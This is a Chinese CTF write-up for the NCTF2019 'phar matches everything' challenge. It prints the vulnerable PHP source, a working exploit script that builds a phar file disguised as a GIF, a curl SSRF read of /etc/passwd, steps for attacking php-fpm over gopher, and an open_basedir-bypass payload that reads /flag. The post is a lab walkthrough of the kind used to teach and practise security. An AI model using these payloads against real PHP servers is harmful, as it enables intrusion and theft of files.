[NCTF2019]phar matches everything

Posted on

2020-05-02 Edited on 2021-01-16 In CTF , PHP , WP

[NCTF2019]phar matches everything

源码

<?php
class Easytest{
    protected $test;
    public function funny_get(){
        return $this->test;
    }
}

class Main {
    public $url;
    public function curl($url){
        $ch = curl_init();  
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $output=curl_exec($ch);
        curl_close($ch);
        return $output;
    }
public function __destruct(){
        $this_is_a_easy_test=unserialize($_GET['careful']);
        if($this_is_a_easy_test->funny_get() === '1'){
            echo $this->curl($this->url);
        }
    }    
}
if(isset($_POST["submit"])) {
    $check = getimagesize($_POST['name']);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
    } else {
        echo "File is not an image.";
    }
}
?>

两次序列化

第一个是利用getimagesize($file_path)触发phar反序列化，触发的反序列化影响Main类

第二个很简单,要是Easytest中的test=1

利用curl读取文件

exp.php

<?php

class Easytest {
	protected $test = '1';
}

class Main {
	public $url ='file:///etc/passwd';
}

$a = new Easytest();
echo serialize($a);
echo urlencode(serialize($a));
$b = new Main();
@unlink("exp.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub('GIF89a' . "<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($b);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
rename('exp.char', "exp.gif");

首先上传exp.gif

然后利用catchmime.php传参触发反序列化

careful用来触发2

name`用来触发`phar

改变url读取hosts,因为这道题想让我们打内网

我读取到了173.187.197.10,再用http协议读一下http://173.187.197.10,发现就是当前页面,再读一下 http://173.187.197.11

php-fpm未授权漏洞

使用链接中的exp

再使用gopher协议使用exp生成的payload

先打phpinfo();可以得知需要绕过open_basedir

加上绕过open_basedir的payload就可以了

<?php mkdir('/tmp/fuck');chdir('/tmp/fuck');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));readfile('/flag');?>

flag在根目录